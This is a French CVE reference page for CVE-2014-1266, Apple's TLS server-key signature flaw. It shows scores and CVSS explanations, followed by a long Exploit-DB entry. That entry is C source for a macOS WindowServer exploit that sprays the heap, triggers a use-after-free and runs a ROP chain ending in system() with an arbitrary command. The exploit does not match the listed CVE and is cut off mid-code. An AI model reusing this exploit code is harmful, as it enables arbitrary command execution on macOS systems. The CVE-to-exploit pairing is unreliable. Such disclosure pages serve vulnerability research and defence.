CVE-2014-1266 Détail

CVE-2014-1266

Score / Gravité

7.4

Haute

Catégories

Authorization problems

OWSAP

A07-Identif. and Authent. Fail

EPSS

0.86%V3

Vecteur

Network

Publié

2014-02-22
14h00 +00:00

Modifié

2014-02-26
23h57 +00:00

Liens officiels

CVE.org

NVD

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Gestion des notifications

Liste des Notifications

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Critères appliqués l'envoi de l'alerte : par rapport à la dernière alerte envoyée + différences au niveau de CISA, EPSS, CVSS, CWE, Solutions, CPE.

Paramètres

Vous pouvez spécifier un titre qui sera récupéré dans les alertes qui seront envoyées.

Spécifiez ici un CVE ID comme CVE-2025-1234

Planifications

Mois

Prochaine exécution calculée

Jour

Jour de la semaine

Heure

Minute

Date de création

Dernière exécution

Prochaine exécution

Fonctionnalité nécessitant une connexion

Cette fonctionnalité qui vous permet de recevoir des alertes, n'est active que lorsque vous êtes connecté à votre compte.

Descriptions du CVE

The SSLVerifySignedServerKeyExchange function in libsecurity_ssl/lib/sslKeyExchange.c in the Secure Transport feature in the Data Security component in Apple iOS 6.x before 6.1.6 and 7.x before 7.0.6, Apple TV 6.x before 6.0.2, and Apple OS X 10.9.x before 10.9.2 does not check the signature in a TLS Server Key Exchange message, which allows man-in-the-middle attackers to spoof SSL servers by (1) using an arbitrary private key for the signing step or (2) omitting the signing step.

Informations du CVE

Faiblesses connexes

CWE-ID	Nom de la faiblesse	Source
CWE-295	Improper Certificate Validation The product does not validate, or incorrectly validates, a certificate.

Métriques

Métriques	Score	Gravité	CVSS Vecteur	Source
V3.1	7.4	HIGH	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N More informations Base: Exploitabilty Metrics The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. Network The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). Attack Complexity This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. High successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. None The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. User Interaction This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component. None The vulnerable system can be exploited without interaction from any user. Base: Scope Metrics The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. Scope Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs. Unchanged An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority. Base: Impact Metrics The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. High There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. High There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. None There is no impact to availability within the impacted component. Temporal Metrics The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability. Environmental Metrics These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.	[email protected]
V2	5.8		AV:N/AC:M/Au:N/C:P/I:P/A:N	[email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 46428

Date de publication : 2019-02-12 23h00 +00:00
Auteur : Synacktiv
EDB Vérifié : No

#import <Cocoa/Cocoa.h> #import <dlfcn.h> #import <mach-o/dyld.h> #import <mach-o/getsect.h> #import <mach/mach_vm.h> #import <pthread.h> #import "offsets.h" //utils #define ENFORCE(a, label) \ do { \ if (__builtin_expect(!(a), 0)) \ { \ timed_log("[!] %s is false (l.%d)\n", #a, __LINE__); \ goto label; \ } \ } while (0) // from https://stackoverflow.com/questions/4415524/common-array-length-macro-for-c #define COUNT_OF(x) ((sizeof(x)/sizeof(0[x])) / ((size_t)(!(sizeof(x) % sizeof(0[x]))))) #define BYTE(buff, offset) (*(uint8_t *)&((uint8_t *)buff)[offset]) #define DWORD(buff, offset) (*(uint32_t *)&((uint8_t *)buff)[offset]) #define QWORD(buff, offset) (*(uint64_t *)&((uint8_t *)buff)[offset]) // constants used by the exploit #define CFSTRING_SPRAY_SIZE (400*1000*1000) #define CFSTRING_SPRAY_COUNT ((CFSTRING_SPRAY_SIZE)/(3*0x8+sizeof(str_array))) #define CFSET_SPRAY_SIZE (300*1000*1000) // pointers (80*8) + internal size (0x40) #define CFSET_SPRAY_COUNT ((CFSET_SPRAY_SIZE)/(80*8+0x40)) #define VULN_IDX (-0xaaaaab) // 4GB should be enough and it's the maximum we can spray in one OOL #define ROP_SPRAY_SIZE (4*0x400ul*0x400ul*0x400ul - 0x1000) #define SPRAYED_BUFFER_ADDRESS 0x200006000 #define NB_CORE_SWITCH 50 #define NB_HOLES_PER_SWITCH 1000 #define NB_REUSE 200 // private functions (both private and public symbols) static int (* SLSNewConnection)(int, int *); static int (* SLPSRegisterForKeyOnConnection)(int, void *, unsigned int, bool); static mach_port_t (* CGSGetConnectionPortById)(uint32_t); static int (* SLSReleaseConnection)(int); static mach_port_t (* SLSServerPort)(void); // push rbp ; mov rbp, rsp ; mov rax, qword ptr [rdi + 8] ; xor esi, esi ; mov edx, 0x118 ; call qword ptr [rax] #define SAVE_RBP_SET_RAX_GADGET ((uint8_t[]){0x55, 0x48, 0x89, 0xe5, 0x48, 0x8b, 0x47, 0x08, 0x31, 0xf6, 0xba, 0x18, 0x01, 0x00, 0x00, 0xff, 0x10}) // mov rax, qword ptr [rax + 8] ; mov rsi, qword ptr [rax] ; call qword ptr [rsi] #define SET_RSI_GADGET ((uint8_t[]){0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x30, 0xff, 0x16}) // mov rdi, qword ptr [rsi + 0x30] ; mov rax, qword ptr [rsi + 0x38] ; mov rsi, qword ptr [rax] ; call qword ptr [rsi] #define SET_RDI_GADGET ((uint8_t[]){0x48, 0x8b, 0x7e, 0x30, 0x48, 0x8b, 0x46, 0x38, 0x48, 0x8b, 0x30, 0xff, 0x16}) // mov rax, qword ptr [rsi + 0x10] ; mov rsi, qword ptr [rax + 0x20] ; mov rax, qword ptr [rsi - 8] ; mov rax, qword ptr [rax] ; pop rbp ; jmp rax #define POP_RBP_JMP_GADGET ((uint8_t[]){0x48, 0x8b, 0x46, 0x10, 0x48, 0x8b, 0x70, 0x20, 0x48, 0x8b, 0x46, 0xf8, 0x48, 0x8b, 0x00, 0x5d, 0xff, 0xe0}) static int resolve_symbols(); static int build_rop_spray(void **rop_spray, char *command_line); static int massage_heap(int connection_id); static int register_application(int connection_id); static int setup_hooks(int connection_id); static int trigger_the_bug(int connection_id); static int reuse_allocation(int connection_id); static int find_dylib_text_section(const char *dylib_name, void **text_address, size_t *text_size); static void timed_log(char* format, ...); static mach_msg_return_t _CGSSetConnectionProperty(mach_port_t connection_port, int connection_id, const char *key_value, const void *serialized_value, uint32_t serialized_value_length, bool deallocate); static mach_msg_return_t _CGSSetAuxConn(uint32_t connection_id, ProcessSerialNumber *process_serial_number); static mach_msg_return_t _CGSCreateApplication(uint32_t connection_id, ProcessSerialNumber sn, uint32_t session_id, uint32_t session_attributes, uint32_t unknown_2, pid_t pid, char *app_name, char multi_process, uint32_t sent_connection_id); int main(int argc, char **argv) { int connection_id = -1; void *rop_spray = NULL; bool free_application = false; ENFORCE(argc == 2, fail); ENFORCE(strlen(argv[1]) < 0x1000 - 0x600, fail); timed_log("[+] Resolving symbols...\n"); ENFORCE(resolve_symbols() == 0, fail); timed_log("[+] Building our ROP chain...\n"); ENFORCE(build_rop_spray(&rop_spray, argv[1]) == 0, fail); timed_log("[+] Creating a fresh connection...\n"); ENFORCE(SLSNewConnection(0, &connection_id) == 0, fail); timed_log("[+] Setup 'hooks'...\n"); ENFORCE(setup_hooks(connection_id) == 0, fail); timed_log("[+] Making holes (des p'tits trous, des p'tits trous, toujours des p'tit trous : https://www.youtube.com/watch?v=HsX4M-by5OY)...\n"); ENFORCE(massage_heap(connection_id) == 0, fail); // no timed_log, we want to be fast :) ENFORCE(register_application(connection_id) == 0, fail); free_application = true; timed_log("[+] Application registered...\n"); timed_log("[+] Triggering the bug\n"); ENFORCE(trigger_the_bug(connection_id) == 0, fail); timed_log("[+] Let's free and reuse the application...\n"); // this will whack the application free_application = false; ENFORCE(reuse_allocation(connection_id) == 0, fail); timed_log("[+] Trigger the UAF...\n"); ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, "SPRAY", rop_spray, ROP_SPRAY_SIZE, true) == KERN_SUCCESS, fail); // the kernel freed the pages for us :) rop_spray = NULL; // a last synchronised request to make sure our command has been executed... ENFORCE(SLPSRegisterForKeyOnConnection(connection_id, &(ProcessSerialNumber){0, 0}, 8, 1) == -50, fail); // don't leave any connections behind us... ENFORCE(SLSReleaseConnection(connection_id) == 0, fail); connection_id = -1; timed_log("[+] OK\n"); return 0; // fail is the label of choice when coding Apple exploit :) (cf. CVE-2014-1266) fail: if (free_application) { ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x12340000; _CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id); } if (connection_id != -1) SLSReleaseConnection(connection_id); if (rop_spray != NULL) mach_vm_deallocate(mach_task_self(), (mach_vm_address_t)rop_spray, ROP_SPRAY_SIZE); return 1; } static int resolve_symbols() { SLSNewConnection = dlsym(RTLD_DEFAULT, "SLSNewConnection"); ENFORCE(SLSNewConnection != NULL, fail); SLPSRegisterForKeyOnConnection = dlsym(RTLD_DEFAULT, "SLPSRegisterForKeyOnConnection"); ENFORCE(SLPSRegisterForKeyOnConnection != NULL, fail); SLSReleaseConnection = dlsym(RTLD_DEFAULT, "SLSReleaseConnection"); ENFORCE(SLSReleaseConnection != NULL, fail); SLSServerPort = dlsym(RTLD_DEFAULT, "SLSServerPort"); ENFORCE(SLSServerPort != NULL, fail); // ugly but we could find its address by parsing private symbols, we just don't want to waste our time coding it... ENFORCE(((uintptr_t)SLPSRegisterForKeyOnConnection & 0xFFF) == (SLPSRegisterForKeyOnConnection_OFFSET & 0xFFF), fail); CGSGetConnectionPortById = (void *)((uint8_t*)SLPSRegisterForKeyOnConnection - SLPSRegisterForKeyOnConnection_OFFSET + CGSGetConnectionPortById_OFFSET); // paranoid checks, check if function starts with push rbp / mov rbp, rsp ENFORCE(memcmp(CGSGetConnectionPortById, "\x55\x48\x89\xe5", 4) == 0, fail); return 0; fail: return -1; } // the trick is here to map multiple times the same page to make a HUGE alloc that doesn't use a lot of physical memory static int build_rop_spray(void **rop_spray, char *command_line) { void *handle_libswiftCore = NULL; void* large_region = NULL; *rop_spray = NULL; // first we reserve a large region ENFORCE(mach_vm_allocate(mach_task_self(), (mach_vm_address_t *)&large_region, ROP_SPRAY_SIZE, VM_FLAGS_ANYWHERE) == KERN_SUCCESS, fail); // then we allocate the first page void *rop_chain = large_region; ENFORCE(mach_vm_allocate(mach_task_self(), (mach_vm_address_t *)&rop_chain, 0x1000, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE) == KERN_SUCCESS, fail); // now we can construct our rop chain void *release_selector = NSSelectorFromString(@"release"); ENFORCE(release_selector != NULL, fail); // + 0x530 because of our forged CFSet and its 1st hash table entry (=0x200002537) BYTE(rop_chain, 0x530 + 0x20) = 0; // flags DWORD(rop_chain, 0x530 + 0x18) = 0; // mask QWORD(rop_chain, 0x530 + 0x10) = SPRAYED_BUFFER_ADDRESS; // cache address QWORD(rop_chain, 0) = (uint64_t)release_selector; // selector // and now the """fun""" part... handle_libswiftCore = dlopen("/System/Library/PrivateFrameworks/Swift/libswiftCore.dylib", RTLD_GLOBAL | RTLD_NOW); ENFORCE(handle_libswiftCore != NULL, fail); void *libJPEG_text_addr; size_t libJPEG_text_size; ENFORCE(find_dylib_text_section("/System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJPEG.dylib", &libJPEG_text_addr, &libJPEG_text_size) == 0, fail); void *libswiftCore_text_addr; size_t libswiftCore_text_size; ENFORCE(find_dylib_text_section("/System/Library/PrivateFrameworks/Swift/libswiftCore.dylib", &libswiftCore_text_addr, &libswiftCore_text_size) == 0, fail); uintptr_t system_address = (uintptr_t)dlsym(RTLD_DEFAULT, "system"); ENFORCE(system_address != 0, fail); // check our gadgets uintptr_t save_rbp_set_rax = (uintptr_t)memmem(libJPEG_text_addr, libJPEG_text_size, SAVE_RBP_SET_RAX_GADGET, sizeof(SAVE_RBP_SET_RAX_GADGET)); ENFORCE(save_rbp_set_rax != 0, fail); uintptr_t set_rsi = (uintptr_t)memmem(libswiftCore_text_addr, libswiftCore_text_size, SET_RSI_GADGET, sizeof(SET_RSI_GADGET)); ENFORCE(set_rsi != 0, fail); uintptr_t set_rdi = (uintptr_t)memmem(libswiftCore_text_addr, libswiftCore_text_size, SET_RDI_GADGET, sizeof(SET_RDI_GADGET)); ENFORCE(set_rdi != 0, fail); uintptr_t pop_rbp_jmp = (uintptr_t)memmem(libswiftCore_text_addr, libswiftCore_text_size, POP_RBP_JMP_GADGET, sizeof(POP_RBP_JMP_GADGET)); ENFORCE(pop_rbp_jmp != 0, fail); ENFORCE(dlclose(handle_libswiftCore) == 0, fail); handle_libswiftCore = NULL; timed_log("[i] Pivot address: 0x%lX\n", save_rbp_set_rax); QWORD(rop_chain, 8) = save_rbp_set_rax; // pivot // SAVE_RBP_SET_RAX: push rbp ; mov rbp, rsp ; mov rax, qword ptr [rdi + 8] ; xor esi, esi ; mov edx, 0x118 ; call qword ptr [rax] // + 0x137 because of our forged CFSet and its 2nd hash table entry QWORD(rop_chain, 0x137) = set_rsi; // rax=0x200002137 // SET_RSI: mov rax, qword ptr [rax + 8] ; mov rsi, qword ptr [rax] ; call qword ptr [rsi] QWORD(rop_chain, 0x137+8) = SPRAYED_BUFFER_ADDRESS+0x240; // rax=SPRAYED_BUFFER_ADDRESS+0x240 QWORD(rop_chain, 0x240) = SPRAYED_BUFFER_ADDRESS+0x248; // rsi=SPRAYED_BUFFER_ADDRESS+0x248 QWORD(rop_chain, 0x248) = set_rdi; // SET_RDI: mov rdi, qword ptr [rsi + 0x30] ; mov rax, qword ptr [rsi + 0x38] ; mov rsi, qword ptr [rax] ; call qword ptr [rsi] QWORD(rop_chain, 0x248+0x30) = SPRAYED_BUFFER_ADDRESS+0x600; // rdi=SPRAYED_BUFFER_ADDRESS+0x500 QWORD(rop_chain, 0x248+0x38) = SPRAYED_BUFFER_ADDRESS+0x248+0x38+8; // rax=SPRAYED_BUFFER_ADDRESS+0x288 QWORD(rop_chain, 0x288) = SPRAYED_BUFFER_ADDRESS+0x288+8; // rsi=SPRAYED_BUFFER_ADDRESS+0x290 QWORD(rop_chain, 0x290) = pop_rbp_jmp; for (uint32_t i = 0; i < 4; i++) { // POP_RBP_JMP: mov rax, qword ptr [rsi + 0x10] ; mov rsi, qword ptr [rax + 0x20] ; mov rax, qword ptr [rsi - 8] ; mov rax, qword ptr [rax] ; pop rbp ; jmp rax QWORD(rop_chain, i*0x48+0x290+0x10) = SPRAYED_BUFFER_ADDRESS+i*0x48+0x290+0x10+8; // rax=SPRAYED_BUFFER_ADDRESS+0x2A8 QWORD(rop_chain, i*0x48+0x2A8+0x20) = SPRAYED_BUFFER_ADDRESS+i*0x48+0x2A8+0x20+8+8; // rsi=SPRAYED_BUFFER_ADDRESS+0x2D8 QWORD(rop_chain, i*0x48+0x2D8-8) = SPRAYED_BUFFER_ADDRESS+i*0x48+0x2A8+0x20+8+8; // rax=SPRAYED_BUFFER_ADDRESS+0x2D8 QWORD(rop_chain, i*0x48+0x2D8) = i == 3 ? system_address : pop_rbp_jmp; // rax=SPRAYED_BUFFER_ADDRESS+0x2D80x600 } strcpy((char *)&BYTE(rop_chain, 0x600), command_line); QWORD(rop_chain, 0x1000-8) = 0xFFFFFFFF; // make sure that the server won't try to parse this... // and duplicate it, we use two for loops to gain some time for (uintptr_t i = 0x1000ul; i < 4*0x400*0x400; i += 0x1000ul) { mach_vm_address_t remapped_page_address = (mach_vm_address_t)large_region+i; vm_prot_t protection = VM_PROT_READ; kern_return_t kr; kr = mach_vm_remap( mach_task_self(), &remapped_page_address, 0x1000, 0, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, mach_task_self(), (mach_vm_address_t)rop_chain, 0, &protection, &protection, VM_INHERIT_NONE ); ENFORCE(kr == KERN_SUCCESS, fail); ENFORCE(remapped_page_address == (mach_vm_address_t)large_region+i, fail); } for (uintptr_t i = 4*0x400*0x400; i < ROP_SPRAY_SIZE; i += 4*0x400*0x400) { mach_vm_address_t remapped_page_address = (mach_vm_address_t)large_region+i; vm_prot_t protection = VM_PROT_READ; kern_return_t kr; kr = mach_vm_remap( mach_task_self(), &remapped_page_address, 4*0x400*0x400, 0, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, mach_task_self(), (mach_vm_address_t)rop_chain, 0, &protection, &protection, VM_INHERIT_NONE ); ENFORCE(kr == KERN_SUCCESS, fail); ENFORCE(remapped_page_address == (mach_vm_address_t)large_region+i, fail); } *rop_spray = large_region; return 0; fail: if (handle_libswiftCore != NULL) dlclose(handle_libswiftCore); if (large_region != NULL) mach_vm_deallocate(mach_task_self(), (mach_vm_address_t)large_region, ROP_SPRAY_SIZE); return -1; } size_t malloc_size(void *); static int massage_heap(int connection_id) { static UInt8 data_buffer[0x70]; memset(data_buffer, 'A', 0x70); CFDataRef hole_data = NULL; CFNumberRef place_holder_number = NULL; CFDataRef serialized_hole_0x60_data = NULL; CFDataRef serialized_hole_0x70_data = NULL; CFDataRef serialized_number_place_holder = NULL; bool free_tmp_application = false; hole_data = CFDataCreate(NULL, data_buffer, 0x60 - 0x40 - 0x20); ENFORCE(hole_data != NULL, fail); serialized_hole_0x60_data = CFPropertyListCreateData(NULL, hole_data, kCFPropertyListBinaryFormat_v1_0, 0, NULL); ENFORCE(serialized_hole_0x60_data != NULL, fail); CFRelease(hole_data); hole_data = NULL; hole_data = CFDataCreate(NULL, data_buffer, 0x70 - 0x40 - 0x20); ENFORCE(hole_data != NULL, fail); serialized_hole_0x70_data = CFPropertyListCreateData(NULL, hole_data, kCFPropertyListBinaryFormat_v1_0, 0, NULL); ENFORCE(serialized_hole_0x70_data != NULL, fail); CFRelease(hole_data); hole_data = NULL; uint64_t v = 0x1337BAB; place_holder_number = CFNumberCreate(NULL, kCFNumberSInt64Type, &v); ENFORCE(place_holder_number != NULL, fail); serialized_number_place_holder = CFPropertyListCreateData(NULL, place_holder_number, kCFPropertyListBinaryFormat_v1_0, 0, NULL); ENFORCE(serialized_number_place_holder != NULL, fail); CFRelease(place_holder_number); place_holder_number = NULL; // now free the data to make holes :) uint8_t *placeholder_data_bytes = (uint8_t *)CFDataGetBytePtr(serialized_number_place_holder); size_t placeholder_data_size = CFDataGetLength(serialized_number_place_holder); for (uint32_t i = 0; i < NB_CORE_SWITCH; i++) { ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x6660000; // help changing core... ENFORCE(_CGSCreateApplication(connection_id, psn, 0, 0, 2, getpid(), "a", true, connection_id) == KERN_SUCCESS, fail); free_tmp_application = true; for (uint32_t j = 0; j < NB_HOLES_PER_SWITCH; j++) { char key[20]; snprintf(key, sizeof(key), "MSSG_%4d_%4d", i, j); CFDataRef data = j%2 == 0 ? serialized_hole_0x70_data : serialized_hole_0x60_data; uint8_t *data_bytes = (uint8_t *)CFDataGetBytePtr(data); size_t data_size = CFDataGetLength(data); ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, key, data_bytes, data_size, false) == KERN_SUCCESS, fail); snprintf(key, sizeof(key), "MSSH_%4d_%4d", i, j); ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, key, placeholder_data_bytes, placeholder_data_size, false) == KERN_SUCCESS, fail); } ENFORCE(_CGSCreateApplication(connection_id, psn, 1, 0, 2, getpid(), "a", false, connection_id) == -50, fail); free_tmp_application = false; } CFRelease(serialized_number_place_holder); serialized_number_place_holder = NULL; CFRelease(serialized_hole_0x60_data); serialized_hole_0x60_data = NULL; CFRelease(serialized_hole_0x70_data); serialized_hole_0x70_data = NULL; for (uint32_t i = 0; i < NB_CORE_SWITCH; i++) { for (uint32_t j = 0; j < NB_HOLES_PER_SWITCH; j++) { char key[20]; snprintf(key, sizeof(key), "MSSG_%4d_%4d", i, j); ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, key, NULL, 0, false) == KERN_SUCCESS, fail); } } return 0; fail: if (hole_data != NULL) CFRelease(hole_data); if (serialized_hole_0x60_data != NULL) CFRelease(serialized_hole_0x60_data); if (serialized_hole_0x70_data != NULL) CFRelease(serialized_hole_0x70_data); if (place_holder_number != NULL) CFRelease(place_holder_number); if (serialized_number_place_holder != NULL) CFRelease(serialized_number_place_holder); if (free_tmp_application) { ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x6660000; _CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id); } return -1; } static int register_application(int connection_id) { ProcessSerialNumber psn; bool free_application = false; char app_name[0x40]; // app_name must be > 0x20 to not use the tiny holes reserved for CFSet and it must be big enough to fill the rest of the space left by the application memset(app_name, 'B', sizeof(app_name)-1); app_name[COUNT_OF(app_name)-1] = 0; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x12340000; ENFORCE(_CGSCreateApplication(connection_id, psn, 0, 0, 2, getpid(), app_name, true, connection_id) == KERN_SUCCESS, fail); free_application = true; // use a psn in the middle-end of our spray psn.lowLongOfPSN = 0x12340000; ENFORCE(_CGSSetAuxConn(connection_id, &psn) == 0, fail); return 0; fail: if (free_application) { psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x12340000; _CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id); } return -1; } static int setup_hooks(int connection_id) { CFNumberRef set_array_values[35] = {NULL}; CFMutableArrayRef big_array = NULL; CFDataRef data = NULL; timed_log("[+] Forging our set...\n"); uint8_t set_hash_table[71] = { 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0 }; uint32_t set_size = 0; uint64_t v = 0x400000001; while (set_size < COUNT_OF(set_array_values)) { CFNumberRef n; n = CFNumberCreate(NULL, kCFNumberSInt64Type, &v); ENFORCE(n != NULL, fail); uint32_t h = CFHash(n)%71; if (set_hash_table[h] == 1) { set_array_values[set_size] = n; set_hash_table[h] = 0; set_size ++; } else { CFRelease(n); } v++; ENFORCE(v < 0x400000001 + 0xFFFFF, fail); } big_array = CFArrayCreateMutable(NULL, 0, &kCFTypeArrayCallBacks); ENFORCE(big_array != NULL, fail); timed_log("[+] Creating our big set array...\n"); for (uint32_t i = 0; i < CFSET_SPRAY_COUNT; i++) { CFArrayRef tmp_array = CFArrayCreate(NULL, (const void **)set_array_values, COUNT_OF(set_array_values), &kCFTypeArrayCallBacks); ENFORCE(tmp_array != NULL, fail); CFArrayAppendValue(big_array, tmp_array); CFRelease(tmp_array); } for (uint32_t i = 0; i < COUNT_OF(set_array_values); i++) { CFRelease(set_array_values[i]); set_array_values[i] = NULL; } timed_log("[+] Serializing it...\n"); data = CFPropertyListCreateData(NULL, big_array, kCFPropertyListBinaryFormat_v1_0, 0, NULL); ENFORCE(data != NULL, fail); CFRelease(big_array); big_array = NULL; uint8_t *data_bytes = (uint8_t *)CFDataGetBytePtr(data); size_t data_size = CFDataGetLength(data); timed_log("[i] Serialized size: %ldMB\n", data_size / (1000*1000)); timed_log("[+] Patching it...\n"); uint32_t nb_arrays = 0; uint32_t cursor = 0; while (1) { uint8_t *position = memmem(&data_bytes[cursor], data_size-cursor, "\xAF\x10\x23", 3); if (position == NULL) break; position[0] = 0xCF; // Array to Set nb_arrays ++; ENFORCE(nb_arrays <= CFSET_SPRAY_COUNT, fail); cursor = (uint32_t)(position-data_bytes) + 3; } ENFORCE(nb_arrays == CFSET_SPRAY_COUNT, fail); ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, "SPRAY", data_bytes, data_size, false) == KERN_SUCCESS, fail); CFRelease(data); data = NULL; return 0; fail: for (uint32_t i = 0; i < COUNT_OF(set_array_values); i++) if (set_array_values[i] != NULL) CFRelease(set_array_values[i]); if (data != NULL) CFRelease(data); if (big_array != NULL) CFRelease(big_array); return -1; } static int trigger_the_bug(int connection_id) { ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x12340000; int32_t index = VULN_IDX; int err; while ((err = SLPSRegisterForKeyOnConnection(connection_id, &psn, index, 1)) != 0) { // ENFORCE((err == 1011) || (err == -600), fail); ENFORCE(++index < VULN_IDX+((2*8*1024*1024)/0x18), fail); // = 2 small regions = 16 MiB } return 0; fail: return -1; } static int reuse_allocation(int connection_id) { CFNumberRef set_array_values[8] = {NULL}; CFMutableArrayRef big_array = NULL; CFDataRef data = NULL; bool free_tmp_application = false; bool free_application = true; timed_log("[+] Forging our set...\n"); uint8_t set_hash_table[13]; memset(set_hash_table, 1, sizeof(set_hash_table)); uint64_t v; v = 0x2000025; set_array_values[0] = CFNumberCreate(NULL, kCFNumberSInt64Type, &v); // == 0x200002537 -> hash = 0 ENFORCE(CFHash(set_array_values[0])%COUNT_OF(set_hash_table) == 0, fail); set_hash_table[0] = 0; v = 0x2000021; set_array_values[1] = CFNumberCreate(NULL, kCFNumberSInt64Type, &v); // == 0x200002137; -> hash = 1 ENFORCE(CFHash(set_array_values[1])%COUNT_OF(set_hash_table) == 1, fail); set_hash_table[1] = 0; v = 0; uint32_t set_size = 2; while (set_size < COUNT_OF(set_array_values)) { CFNumberRef n; n = CFNumberCreate(NULL, kCFNumberSInt64Type, &v); ENFORCE(n != NULL, fail); uint32_t h = CFHash(n)%COUNT_OF(set_hash_table); if (set_hash_table[h] == 1) { set_array_values[set_size] = n; set_hash_table[h] = 0; set_size ++; } else { CFRelease(n); } v++; ENFORCE(v < 0xFFFFF, fail); } big_array = CFArrayCreateMutable(NULL, 0, &kCFTypeArrayCallBacks); ENFORCE(big_array != NULL, fail); timed_log("[+] Creating our big set array...\n"); for (uint32_t i = 0; i < NB_REUSE; i++) { CFArrayRef tmp_array = CFArrayCreate(NULL, (const void **)set_array_values, COUNT_OF(set_array_values), &kCFTypeArrayCallBacks); ENFORCE(tmp_array != NULL, fail); CFArrayAppendValue(big_array, tmp_array); CFRelease(tmp_array); } for (uint32_t i = 0; i < COUNT_OF(set_array_values); i++) { CFRelease(set_array_values[i]); set_array_values[i] = NULL; } timed_log("[+] Serializing it...\n"); data = CFPropertyListCreateData(NULL, big_array, kCFPropertyListBinaryFormat_v1_0, 0, NULL); ENFORCE(data != NULL, fail); CFRelease(big_array); big_array = NULL; uint8_t *data_bytes = (uint8_t *)CFDataGetBytePtr(data); size_t data_size = CFDataGetLength(data); timed_log("[i] Serialized size: %ldMB\n", data_size / (1000*1000)); timed_log("[+] Patching it...\n"); uint32_t nb_arrays = 0; uint32_t cursor = 0; while (1) { uint8_t *position = memmem(&data_bytes[cursor], data_size-cursor, "\xA8\x02\x03", 3); if (position == NULL) break; position[0] = 0xC8; // Array to Set nb_arrays ++; ENFORCE(nb_arrays <= NB_REUSE, fail); cursor = (uint32_t)(position-data_bytes) + 